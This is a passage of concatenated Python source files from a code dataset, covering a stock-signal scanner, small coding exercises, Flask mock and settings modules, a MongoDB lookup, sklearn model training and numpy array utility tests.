mas[\"10\"][-1] and c0 > mas[\"20\"][-1] \\\n                     and c0 > mas[\"60\"][-1]\n\n                # The 60-bar moving average slopes upward\n                slope_60, err = signal.slope(mas[\"60\"][-10:])\n                if err is None or err > 5e-4:\n                    continue\n\n                t2 = slope_60 >= 5e-4\n\n                # The moving averages converge\n                diff = np.abs(mas[\"5\"][-6:-1] - mas[\"10\"][-6:-1]) / mas[\"10\"][-6:-1]\n                overlap_5_10 = np.count_nonzero(diff < 5e-3)\n                t3 = overlap_5_10 > 3\n\n                diff = np.abs(mas[\"10\"][-10:] - mas[\"60\"][-10:]) / mas[\"60\"][-10:]\n                overlap_10_60 = np.count_nonzero(diff < 5e-3)\n                t4 = overlap_10_60 > 5\n\n                price_change = await sec.price_change(end,\n                                                      tf.shift(end, 8, frame_type),\n                                                      frame_type)\n                result.append([end, code, t1, t2, t3, t4, slope_60, price_change, True])\n\n                if t1 and t2 and t3 and t4:\n                    print(\"FIRED:\", [end, code, t1, t2, t3, t4, slope_60,\n                                     price_change, True])\n\n            except Exception as e:\n                pass\n\n        return result\n\n    async def scan(self, start: Frame, end: Frame, signal_func: Callable,\n                   frame_type: FrameType = FrameType.DAY):\n        frames = tf.get_frames(start, end, frame_type)\n        results = []\n        for frame in frames:\n            if frame_type in tf.day_level_frames:\n                frame = tf.int2date(frame)\n            else:\n                frame = tf.int2time(frame)\n            result = await signal_func(frame, frame_type=frame_type)\n            results.extend(result)\n\n        df = DataFrame(data=results,\n                       columns=['date', 'code', 't1', 't2','t3','t4', 'slope_60',\n                                'pct', \"fired\"])\n        
df.to_csv(\"/tmp/two.csv\")\n","sub_path":"alpha/plots/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"446751719","text":"from itertools import combinations\nn = int(input())\nmatrix = [list(map(int, input().split())) for _ in range(n)]\nresult = []\nfor i in combinations(range(n), int(n/2)) :\n start_score = 0\n link_score = 0\n link = set(range(n)) - set(i)\n for j, k in zip(combinations(i, 2), combinations(link, 2)):\n start_score += matrix[j[0]][j[1]]+matrix[j[1]][j[0]]\n link_score += matrix[k[0]][k[1]]+matrix[k[1]][k[0]]\n result.append(int(abs(start_score-link_score)))\nprint(min(result))\n","sub_path":"2018/CodingInterview/4주차/4주차.py","file_name":"4주차.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"441133983","text":"import xlsxwriter\n\ndef create(y_predict):\n # Create a workbook and add a worksheet.\n workbook = xlsxwriter.Workbook('output.xlsx')\n worksheet = workbook.add_worksheet()\n\n\n # Start from the first cell. Rows and columns are zero indexed.\n row = 1\n col = 0\n\n # Iterate over the data and write it out row by row.\n worksheet.write(0,0,'SECTION')\n for y in y_predict:\n worksheet.write(row, col, y)\n row += 1\n\n\n workbook.close()","sub_path":"create_xlsx.py","file_name":"create_xlsx.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209057329","text":"# from flask_philo.commands_flask_philo import gen_salt\n\n# ISO 8601 https://en.wikipedia.org/wiki/ISO_8601\nDATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S'\n\nDATE_FORMAT = '%Y-%m-%d'\n\nLOG_LEVEL = 'DEBUG'\n\nHOST = '127.0.0.1'\n\nPORT = 8080\n\nFLASK_PHILO_EXTENSIONS = ()\n","sub_path":"flask_philo_core/default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277597381","text":"# ===================================\n# FILE WHERE ALL UTILITIES ARE STORED\n# ===================================\n\n# Imported modules\nimport math\nimport problem_1_to_32\n\n\n# List containing all resolved problems\nproblems = [\n \"1) Trouver la somme de tous les multiples de 5 ou 7 inférieurs à x\",\n \"2) En prenant en compte les termes de la suite de Fibonacci dont les valeurs ne dépassent pas x, trouver la somme des termes impairs\",\n \"3) Quel est le plus grand facteur premier du nombre x ?\",\n \"4) Quel est le plus grand palindrome que l'on peut obtenir en multipliant un nombre de x chiffres avec un nombre de y chiffres ?\",\n \"5) Que vaut la somme des chiffres composant le nombre x^y ?\",\n \"6) Trouver la somme des chiffres du nombre x! 
?\"\n]\n\n# Dictionnary containing all functions\nfunctions = {\n 1: problem_1_to_32.problem_1,\n 2: problem_1_to_32.problem_2,\n 3: problem_1_to_32.problem_3,\n 4: problem_1_to_32.problem_4,\n 5: problem_1_to_32.problem_5,\n 6: problem_1_to_32.problem_6\n}\n\n# Function to search the correct function for the problem asked\ndef problem_to_solve(number):\n\n # Search the function in the dictionnary\n func = functions.get(number, lambda: \"Aucun problème sélectionné.\")\n\n # Execute the function if founded\n func()\n\n# Function to check the input for the selection and resolution of a problem\ndef check_input(text):\n\n # Value\n is_ok = False\n\n while is_ok == False:\n max = input(text)\n\n if not max.isdigit():\n print(\"Veuillez entrer une valeur correcte.\")\n else:\n is_ok = True\n max = int(max)\n \n return max\n\n# Function to find a list of prime numbers in the range of the argument\ndef list_prime_numbers(max):\n prime_numbers = []\n\n for prime in range(2, (max)+1):\n isPrime = True\n for num in range(2, int(prime ** 0.5) + 1):\n if prime % num == 0:\n isPrime = False\n break\n\n if isPrime:\n prime_numbers.append(prime) \n\n return prime_numbers\n\n# Function to find the greatest number in the range \ndef greatest_number(digit):\n max = \"9\" * digit\n \n return int(max)\n\n# Function to check if it's a palindrome\ndef is_palindrome(palindrome):\n number = str(palindrome)\n reversed = number[::-1]\n return number == reversed\n\n# Function to get the factorial from the math module\ndef factorial(exponent):\n return math.factorial(exponent)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158152488","text":"#! 
/usr/bin/python3\n# coding=utf-8\n\nimport pymongo\nimport re\n\nCL = pymongo.MongoClient()\nDB = CL['ner-dict']\nC = DB.ents\n\n\ndef lookup(alias):\n # as regex search in mongo is very slow, do a phrase search in mongo\n # and then a regex search only on the results\n alias_for_phrase_search = '\\\"{}\\\"'.format(alias)\n res = C.find({\"$text\": {\"$search\": alias_for_phrase_search}})\n\n alias_for_regex_search = r'^{}$'.format(alias)\n try:\n regex_alias = re.compile(alias_for_regex_search)\n except:\n print(\"problem with: '{}'!\".format(alias))\n return []\n good_matches = []\n for r in res:\n if r['type'] == 'other':\n continue\n for a in r['aliases']:\n if regex_alias.match(a):\n good_matches.append(r)\n\n return good_matches\n\n\nif __name__ == \"__main__\":\n print(C.count())\n t = lookup(\"יונתן בן עוזיאל\")\n for r in t:\n print(r)\n","sub_path":"db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"247173836","text":"# Libaries \nfrom flask import Flask\n\n# - To make HTTP Requests\nimport requests \n\n\n\n\ndef CheckZipCodes():\n total =0\n url = \"https://mls.foreclosure.com/listing/search?lc=foreclosure&loc=\" + '08816'\n requestUrl = requests.get(url)\n requestText = requestUrl.text\n requestTextSplit = requestText.split('\\n')\n for lines in requestTextSplit:\n if lines[0:15].lower() == 'var markersdata':\n print(lines)\n\nCheckZipCodes()\n","sub_path":"StephenTesterRealEstate.py","file_name":"StephenTesterRealEstate.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"624702654","text":"# -----------------------------------\n# Tem Tamre\n# CMPT 103: Lab 2\n# Program Name: Lab 2 Assignments\n# -----------------------------------\n\n\n# Question 1: Fill in the blanks\n# a)\nfor i in range(20, 33, 3):\n print(i)\n# b)\nfor i in range(7, -2, -2):\n print(i)\n\n\n# Purpose: This function asks the user to enter 5 integers, calculates and\n# prints the average of these numbers, and prints the numbers entered that\n# are greater than the average\n# Parameters: None\n# Return: None\ndef calculate_average():\n integer_list = []\n total = 0\n while len(integer_list) < 5:\n user_input = int(input(\"Please enter an integer: \"))\n integer_list.append(user_input)\n for elem in integer_list:\n total += elem\n average = total / len(integer_list)\n\n print(\"\\nThe average is:\", average)\n print(\"The numbers greater than the average are:\")\n for elem in integer_list:\n if elem > average:\n print(elem, end=\"\\t\")\n\n\n# Purpose: This function takes an alphabetic string and prints out the number\n# of times each letter (upper- or lower-case) is in the string\n# Parameter: string - a string of only alphabetic characters\n# Return: None\ndef letter_counter(string):\n first_letters = []\n for letter in string:\n if letter.lower() not in first_letters:\n first_letters.append(letter.lower())\n for letter in first_letters:\n print(\"The letter\", letter, \"is in\", string,\n string.lower().count(letter), \"time(s)\")\n","sub_path":"labs/Lab2_TT.py","file_name":"Lab2_TT.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"164462058","text":"import json\nimport chardet\n\nnumbers = [1, 2, 3, 4, 5, 6]\n\nfilename = 'numbers.json'\nwith open(filename, 'w') as f_obj:\n 
json.dump(numbers, f_obj)\n\nfile_path = 'D:/Desktop/OneDrive/3GitHub/python_learn/file_test.txt'\nwith open(file_path) as file_object:\n    contents = file_object.read()\n    print(contents.rstrip())\n    for line in file_object:\n        print(line.rstrip())\n\nwith open(filename) as f_obj:\n    numbers = json.load(f_obj)\n\nprint(numbers)\n\nf = open(\"D:/Desktop/OneDrive/3GitHub/python_learn/list.py\", \"r\", encoding=\"utf-8\")\ndata = f.read()\nprint(data)\nf.close()\n\n# result = chardet.detect(f)\n# print(result)\n#\n\nf = open('file_test.txt', 'w')\nf.write('\\ntest')\nf.write('\\ntest2')\n\nf.readline()\n\nf.close()\nf.readable()\n\n","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"642533215","text":"SEED = 69\r\n\r\nimport pandas as pd\r\nimport json\r\nimport pickle\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.metrics import accuracy_score\r\nimport utils\r\nimport numpy as np\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndef get_models():\r\n    \"\"\"\r\n    Returns a dictionary of classification models to train\r\n    :Input\r\n        None\r\n    :Returns\r\n        baseModels - a dictionary of classification models\r\n    \"\"\"\r\n    baseModels = {}\r\n    baseModels['LogisticRegression'] = LogisticRegression(n_jobs = -1)\r\n    baseModels['DecisionTreeClassifier'] = DecisionTreeClassifier()\r\n    baseModels['AdaBoostClassifier'] = AdaBoostClassifier()\r\n    baseModels['GradientBoostingClassifier'] = GradientBoostingClassifier()\r\n    baseModels['RandomForestClassifier'] = RandomForestClassifier(n_jobs = -1, n_estimators=200)\r\n    baseModels['ExtraTreesClassifier'] = ExtraTreesClassifier(n_jobs = -1, n_estimators=200)\r\n    baseModels['SupportVectorClassifier'] = SVC()\r\n    baseModels['KNeighborsClassifier'] = KNeighborsClassifier(n_jobs = -1)\r\n    baseModels['GaussianNB'] = GaussianNB()\r\n    return baseModels\r\n\r\n\r\ndef train_and_evaluate_models(x_train, y_train, x_test, y_test, models):\r\n    \"\"\"\r\n    Returns a dictionary of trained models\r\n    :Input\r\n        x_train - independent variable to train model on\r\n        y_train - dependent variable\r\n        x_test - independent variable to test the model\r\n        y_test - true labels used to test the model\r\n        models - a dictionary containing objects of classification models\r\n    :Returns\r\n        models - the same dictionary of classification models after training\r\n    \"\"\"\r\n    print('****Training Models****')\r\n\r\n    for name, _model in models.items():\r\n        \r\n        _model.fit(x_train, y_train)\r\n        y_pred = _model.predict(x_test)\r\n        score = accuracy_score(y_test, y_pred)\r\n        print(name, score)\r\n    return models\r\n\r\ndef score_models(x_train, y_train, models, num_folds = 5):\r\n    \"\"\"\r\n    Cross validates models using sklearn's StratifiedKFold\r\n    :Input\r\n        x_train - independent variable\r\n        y_train - dependent variable\r\n        models - dictionary containing objects of classification models indexed by name\r\n        num_folds - integer denoting no of folds to use for cv\r\n    :Returns\r\n        scores - dictionary containing mean cross val score of the models\r\n    \"\"\"\r\n    print('****Cross Validating models****')\r\n    scores = {}\r\n    num_folds = 5\r\n\r\n    for name, model in models.items():\r\n        kfold = StratifiedKFold(n_splits=num_folds, random_state=SEED, shuffle = True)\r\n        cv_results = cross_val_score(model, x_train, y_train, cv=kfold, scoring='accuracy', n_jobs = -1)\r\n        msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\r\n        print(msg)\r\n        scores[name] = cv_results.mean()\r\n\r\n    return scores\r\n\r\ndef save_models(models, path = \"models/\"):\r\n    \"\"\"\r\n    Saves models as pickle files\r\n\r\n    :Input\r\n        models - dictionary containing model trained objects\r\n\r\n    :Returns:\r\n        None\r\n    \"\"\"\r\n    print('****Saving Models****')\r\n    for name, model in models.items():\r\n        model_file = path + \"{0}.pkl\".format(name)\r\n\r\n        with open(model_file, 'wb') as file:\r\n            pickle.dump(model, file)\r\n    print('****Saved Successfully****')\r\n\r\n#Opening config file to get the dataset path\r\nwith open('CONFIG.json') as config_file:\r\n    CONFIG = json.load(config_file)\r\npath = CONFIG['raw_data_path']\r\n\r\n#Reading the dataset\r\ndata = pd.read_csv(path)\r\n\r\n#Getting training and test vectors\r\nx_train, x_test, y_train, y_test = utils.preprocess_data(data, 0.10)\r\n\r\n#Getting models\r\nmodels = get_models()\r\n\r\n#Cross validating the models\r\nscores = score_models(x_train, y_train, models, num_folds = 5)\r\n#Training models\r\ntrained_models = train_and_evaluate_models(x_train, y_train, x_test, y_test, models)\r\nprint(trained_models['RandomForestClassifier'].predict(np.array([90,42,43,20.87974371,82.00274423,6.502985292000001,202.9355362]).reshape(1, -1)))\r\n#Saving models as pickle file\r\nsave_models(models)\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"460276365","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EndpointRegistrationUpdateApiModel(Model):\n \"\"\"Endpoint registration update request.\n\n :param user: User authentication to change on the endpoint.\n :type user: ~azure-iiot-opc-registry.models.CredentialApiModel\n \"\"\"\n\n _attribute_map = {\n 'user': {'key': 'user', 'type': 'CredentialApiModel'},\n }\n\n def __init__(self, user=None):\n super(EndpointRegistrationUpdateApiModel, self).__init__()\n self.user = user\n","sub_path":"generated/python/azure-iiot-opc-registry/models/endpoint_registration_update_api_model.py","file_name":"endpoint_registration_update_api_model.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343394996","text":"#CS 101\n#Program 1\n#Alfred Harris\n#ajhyr9@mail.umkc.edu\n#Problem: \n# \tDetermine the total amount of pasta(in oz.)required for the large spaghetti \n#\tparty based on the number of attendees of varying type provided by the user.\n#Algorithm: \n#\t1. Prompt for user input for number of adults, number of students, and \n#\t\tnumber of children that will attend the large spaghetti party.\n# \t2. Convert user input for number of adults, number of students, and number of \n# \t\tchildren to integer data type\n# 3. Compute total amount of pasta needed for large spaghetti party \n# (where: Adult serving size of pasta is 8 ounces, Student serving size of \n# pasta is 12 ounces, Children serving size of pasta is 4 ounces, and \n# the Total Pasta required =(# of adults attending * adult serving size) +\n# (# of students attending * student serving size) + \n# (# of children attedning * child serving size) \n\n\n\"\"\"Prompt for user input and assign that input to variable, and convert given \ninput to integer data type\"\"\" \n\nadults_attending = input (\"How many adults are attending your spaghetti party?\")\nadults_attending_int = int(adults_attending)\n\nstudents_attending = input (\"How many students are attending your spaghetti party?\")\nstudents_attending_int = int(students_attending)\n\nchildren_attending = input (\"How many children are attending your spaghetti party?\")\nchildren_attending_int = int(children_attending)\n\n# assigns serving sizes of pasta for each type person to variable \nadult_serving_size_int = 8\nstudent_serving_size_int = 12\nchild_serving_size_int = 4\n\n# compute and print to console the total amount of pasta needed for the party \ntotal_pasta_required_int = ((adults_attending_int * adult_serving_size_int)+\n (students_attending_int * student_serving_size_int)+ \n (children_attending_int * child_serving_size_int ))\nprint (\"You will need a total of\",total_pasta_required_int, \\\n \"ounces of pasta for your large spaghetti party!\")\n","sub_path":"Program_1.py","file_name":"Program_1.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274792851","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom contextlib import contextmanager\n\nfrom flask import Response\nfrom flask import abort as _abort\n\nfrom ...utils import pyv\n\nif pyv.IS_PYTHON_2:\n import urlparse\nelse:\n from urllib 
import parse\n\n\nDEFAULT_STATUS_CODE = 200\nDEFAULT_HTTP_METHOD = 'GET'\n\nABORT_ATTRIBUTE_NAME = '__abort__'\n\n\ndef on_file(mock, fp):\n mock.__on_file__(fp)\n\n\ndef abort(mock, status_code):\n setattr(mock, ABORT_ATTRIBUTE_NAME, status_code)\n\n\ndef parse_for_meta(string):\n http_method, status_code, url_rule = [\n item.strip() for item in string.split(' ')\n ]\n return http_method, status_code, url_rule\n\n\ndef parse_for_header(string):\n key = string[:string.index(':'):]\n value = string[string.index(':') + 1:]\n\n return key.strip(), value.strip()\n\n\nclass BaseMock(object):\n\n __headers__ = None\n __mime_type__ = None\n __content_type__ = None\n\n HEADER_REGEXP = re.compile(r'[A-z -]+:.*\\s')\n META_REGEXP = re.compile(r'[A-Z]{3,6}\\s[0-9]{3}\\s\\/.*\\s')\n\n def __init__(self,\n endpoint,\n url_rule,\n body=None,\n headers=None,\n mime_type=None,\n status_code=None,\n http_method=None,\n content_type=None):\n self._body = body or ''\n self._url_rule = url_rule\n self._endpoint = endpoint\n self._mime_type = mime_type\n self._headers = headers or {}\n self._content_type = content_type\n self._status_code = status_code or DEFAULT_STATUS_CODE\n self._http_method = http_method or DEFAULT_HTTP_METHOD\n\n if self.__headers__:\n for k, v in self.__headers__:\n self._headers.setdefault(k, v)\n\n def __call__(self, *args, **kwargs):\n abort_code = getattr(\n self, ABORT_ATTRIBUTE_NAME, None,\n )\n\n if abort_code:\n _abort(abort_code)\n\n return self.make_response()\n\n def __repr__(self):\n return ''.format(\n self.url_rule, self.http_method, self.endpoint,\n )\n\n def __eq__(self, other):\n compare = (\n self.url_rule == other.url_rule,\n self.http_method == other.http_method,\n )\n return all(compare)\n\n def __on_file__(self, fp):\n body = []\n\n for line in fp.readlines():\n try:\n line = line.decode('utf-8')\n except AttributeError: # please python 3 :)\n pass\n\n if line.startswith('#'): # pass comment line\n continue\n\n if self.HEADER_REGEXP.search(line):\n key, value = parse_for_header(line)\n self._headers[key] = value\n elif self.META_REGEXP.search(line):\n http_method, status_code, url_rule = parse_for_meta(line)\n self._url_rule = url_rule\n self._http_method = http_method\n self._status_code = status_code\n else:\n # Other line as body item\n body.append(line)\n\n self._body = u''.join(body)\n\n @classmethod\n def from_file(cls, file_path):\n with open(file_path, 'r') as fp:\n mock = cls(file_path, None)\n on_file(mock, fp)\n return mock\n\n @property\n def body(self):\n return self._body\n\n @property\n def headers(self):\n return self._headers\n\n @property\n def endpoint(self):\n return self._endpoint\n\n @property\n def url_rule(self):\n return self._url_rule\n\n @property\n def params(self):\n if pyv.IS_PYTHON_2:\n return urlparse.parse_qs(\n urlparse.urlparse(self.url_rule).query,\n )\n return parse.parse_qs(\n parse.urlparse(self._url_rule).query,\n )\n\n @property\n def status_code(self):\n return int(self._status_code)\n\n @property\n def http_method(self):\n return self._http_method.upper()\n\n @property\n def mime_type(self):\n return self._mime_type or self.__mime_type__\n\n @property\n def content_type(self):\n return self._content_type or self.__content_type__\n\n @contextmanager\n def as_(self, mock):\n assert self == mock\n\n endpoint = self._endpoint\n self._endpoint = mock.endpoint\n try:\n yield\n finally:\n self._endpoint = endpoint\n\n def make_response(self):\n return Response(\n self.body,\n headers=self.headers,\n mimetype=self.mime_type,\n 
status=self.status_code,\n content_type=self.content_type,\n )\n","sub_path":"seismograph/ext/mocker/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"57933517","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests of array utility functions.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal as ae\nfrom pytest import raises\n\nfrom ..array import (_unique,\n _normalize,\n _index_of,\n _as_array,\n _as_tuple,\n chunk_bounds,\n excerpts,\n data_chunk,\n get_excerpts,\n PartialArray,\n _partial_shape,\n _range_from_slice,\n _pad,\n _concatenate_virtual_arrays,\n )\nfrom ...io.mock.artificial import artificial_spike_clusters\n\n\n#------------------------------------------------------------------------------\n# Test utility functions\n#------------------------------------------------------------------------------\n\ndef test_range_from_slice():\n \"\"\"Test '_range_from_slice'.\"\"\"\n\n class _SliceTest(object):\n \"\"\"Utility class to make it more convenient to test slice objects.\"\"\"\n def __init__(self, **kwargs):\n self._kwargs = kwargs\n\n def __getitem__(self, item):\n if isinstance(item, slice):\n return _range_from_slice(item, **self._kwargs)\n\n with raises(ValueError):\n _SliceTest()[:]\n with raises(ValueError):\n _SliceTest()[1:]\n ae(_SliceTest()[:5], [0, 1, 2, 3, 4])\n ae(_SliceTest()[1:5], [1, 2, 3, 4])\n\n with raises(ValueError):\n _SliceTest()[::2]\n with raises(ValueError):\n _SliceTest()[1::2]\n ae(_SliceTest()[1:5:2], [1, 3])\n\n with raises(ValueError):\n _SliceTest(start=0)[:]\n with raises(ValueError):\n _SliceTest(start=1)[:]\n with raises(ValueError):\n _SliceTest(step=2)[:]\n\n ae(_SliceTest(stop=5)[:], [0, 1, 2, 3, 4])\n ae(_SliceTest(start=1, stop=5)[:], [1, 2, 3, 4])\n ae(_SliceTest(stop=5)[1:], [1, 2, 3, 4])\n ae(_SliceTest(start=1)[:5], [1, 2, 3, 4])\n ae(_SliceTest(start=1, step=2)[:5], [1, 3])\n ae(_SliceTest(start=1)[:5:2], [1, 3])\n\n ae(_SliceTest(length=5)[:], [0, 1, 2, 3, 4])\n with raises(ValueError):\n _SliceTest(length=5)[:3]\n ae(_SliceTest(length=5)[:10], [0, 1, 2, 3, 4])\n ae(_SliceTest(length=5)[:5], [0, 1, 2, 3, 4])\n ae(_SliceTest(start=1, length=5)[:], [1, 2, 3, 4, 5])\n ae(_SliceTest(start=1, length=5)[:6], [1, 2, 3, 4, 5])\n with raises(ValueError):\n _SliceTest(start=1, length=5)[:4]\n ae(_SliceTest(start=1, step=2, stop=5)[:], [1, 3])\n ae(_SliceTest(start=1, stop=5)[::2], [1, 3])\n ae(_SliceTest(stop=5)[1::2], [1, 3])\n\n\ndef test_pad():\n arr = np.random.rand(10, 3)\n\n ae(_pad(arr, 0, 'right'), arr[:0, :])\n ae(_pad(arr, 3, 'right'), arr[:3, :])\n ae(_pad(arr, 9), arr[:9, :])\n ae(_pad(arr, 10), arr)\n\n ae(_pad(arr, 12, 'right')[:10, :], arr)\n ae(_pad(arr, 12)[10:, :], np.zeros((2, 3)))\n\n ae(_pad(arr, 0, 'left'), arr[:0, :])\n ae(_pad(arr, 3, 'left'), arr[7:, :])\n ae(_pad(arr, 9, 'left'), arr[1:, :])\n ae(_pad(arr, 10, 'left'), arr)\n\n ae(_pad(arr, 12, 'left')[2:, :], arr)\n ae(_pad(arr, 12, 'left')[:2, :], np.zeros((2, 3)))\n\n with raises(ValueError):\n _pad(arr, -1)\n\n\ndef test_unique():\n \"\"\"Test _unique() function\"\"\"\n _unique([])\n\n n_spikes = 1000\n n_clusters = 10\n spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)\n ae(_unique(spike_clusters), np.arange(n_clusters))\n\n\ndef 
test_normalize():\n    \"\"\"Test _normalize() function.\"\"\"\n\n    n_channels = 10\n    positions = 1 + 2 * np.random.randn(n_channels, 2)\n\n    # Keep ratio is False.\n    positions_n = _normalize(positions)\n\n    x_min, y_min = positions_n.min(axis=0)\n    x_max, y_max = positions_n.max(axis=0)\n\n    # np.allclose() only returns a bool; assert it so the test can actually fail.\n    assert np.allclose(x_min, 0.)\n    assert np.allclose(x_max, 1.)\n    assert np.allclose(y_min, 0.)\n    assert np.allclose(y_max, 1.)\n\n    # Keep ratio is True.\n    positions_n = _normalize(positions, keep_ratio=True)\n\n    x_min, y_min = positions_n.min(axis=0)\n    x_max, y_max = positions_n.max(axis=0)\n\n    assert np.allclose(min(x_min, y_min), 0.)\n    assert np.allclose(max(x_max, y_max), 1.)\n    assert np.allclose(x_min + x_max, 1)\n    assert np.allclose(y_min + y_max, 1)\n\n\ndef test_index_of():\n    \"\"\"Test _index_of.\"\"\"\n    arr = [36, 42, 42, 36, 36, 2, 42]\n    lookup = _unique(arr)\n    ae(_index_of(arr, lookup), [1, 2, 2, 1, 1, 0, 2])\n\n\ndef test_as_tuple():\n    assert _as_tuple(3) == (3,)\n    assert _as_tuple((3,)) == (3,)\n    assert _as_tuple(None) is None\n    assert _as_tuple((None,)) == (None,)\n    assert _as_tuple((3, 4)) == (3, 4)\n    assert _as_tuple([3]) == ([3], )\n    assert _as_tuple([3, 4]) == ([3, 4], )\n\n\ndef test_as_array():\n    ae(_as_array(3), [3])\n    ae(_as_array([3]), [3])\n    ae(_as_array(3.), [3.])\n    ae(_as_array([3.]), [3.])\n\n    with raises(ValueError):\n        _as_array(map)\n\n\ndef test_concatenate_virtual_arrays():\n    arr1 = np.random.rand(5, 2)\n    arr2 = np.random.rand(4, 2)\n\n    def _concat(*arrs):\n        return np.concatenate(arrs, axis=0)\n\n    # Single array.\n    concat = _concatenate_virtual_arrays([arr1])\n    ae(concat[:], arr1)\n    ae(concat[1:], arr1[1:])\n    ae(concat[:3], arr1[:3])\n    ae(concat[1:4], arr1[1:4])\n\n    # Two arrays.\n    concat = _concatenate_virtual_arrays([arr1, arr2])\n    # First array.\n    ae(concat[1:], _concat(arr1[1:], arr2))\n    ae(concat[:3], arr1[:3])\n    ae(concat[1:4], arr1[1:4])\n    # Second array.\n    ae(concat[5:], arr2)\n    ae(concat[6:], arr2[1:])\n    ae(concat[5:8], arr2[:3])\n    ae(concat[7:9], arr2[2:])\n    ae(concat[7:12], arr2[2:])\n    ae(concat[5:-1], arr2[:-1])\n    # Both arrays.\n    ae(concat[:], _concat(arr1, arr2))\n    ae(concat[1:], _concat(arr1[1:], arr2))\n    ae(concat[:-1], _concat(arr1, arr2[:-1]))\n    ae(concat[:9], _concat(arr1, arr2))\n    ae(concat[:10], _concat(arr1, arr2))\n    ae(concat[:8], _concat(arr1, arr2[:-1]))\n    ae(concat[1:7], _concat(arr1[1:], arr2[:-2]))\n    ae(concat[4:7], _concat(arr1[4:], arr2[:-2]))\n\n\n#------------------------------------------------------------------------------\n# Test chunking\n#------------------------------------------------------------------------------\n\ndef test_chunk_bounds():\n    chunks = chunk_bounds(200, 100, overlap=20)\n\n    assert next(chunks) == (0, 100, 0, 90)\n    assert next(chunks) == (80, 180, 90, 170)\n    assert next(chunks) == (160, 200, 170, 200)\n\n\ndef test_chunk():\n    data = np.random.randn(200, 4)\n    chunks = chunk_bounds(data.shape[0], 100, overlap=20)\n\n    with raises(ValueError):\n        data_chunk(data, (0, 0, 0))\n\n    assert data_chunk(data, (0, 0)).shape == (0, 4)\n\n    # Chunk 1.\n    ch = next(chunks)\n    d = data_chunk(data, ch)\n    d_o = data_chunk(data, ch, with_overlap=True)\n\n    ae(d_o, data[0:100])\n    ae(d, data[0:90])\n\n    # Chunk 2.\n    ch = next(chunks)\n    d = data_chunk(data, ch)\n    d_o = data_chunk(data, ch, with_overlap=True)\n\n    ae(d_o, data[80:180])\n    ae(d, data[90:170])\n\n\ndef test_excerpts_1():\n    bounds = [(start, end) for (start, end) in excerpts(100,\n                                                        n_excerpts=3,\n                                                        excerpt_size=10)]\n    assert bounds == [(0, 10), (45, 55), (90, 100)]\n\n\ndef test_excerpts_2():\n    bounds = [(start, end) for (start, end) in 
